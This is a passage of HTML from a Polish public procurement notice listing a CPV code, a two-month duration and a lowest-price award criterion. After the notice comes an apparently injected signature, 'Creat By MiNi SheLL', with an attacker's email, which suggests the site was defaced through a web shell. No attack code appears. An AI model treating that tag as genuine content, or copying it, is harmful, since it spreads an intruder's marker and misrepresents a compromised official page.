Wszystkie zajęcia muszą odbywać się wewnątrz zaproponowanych przez Wykonawcę obiektów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.14.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com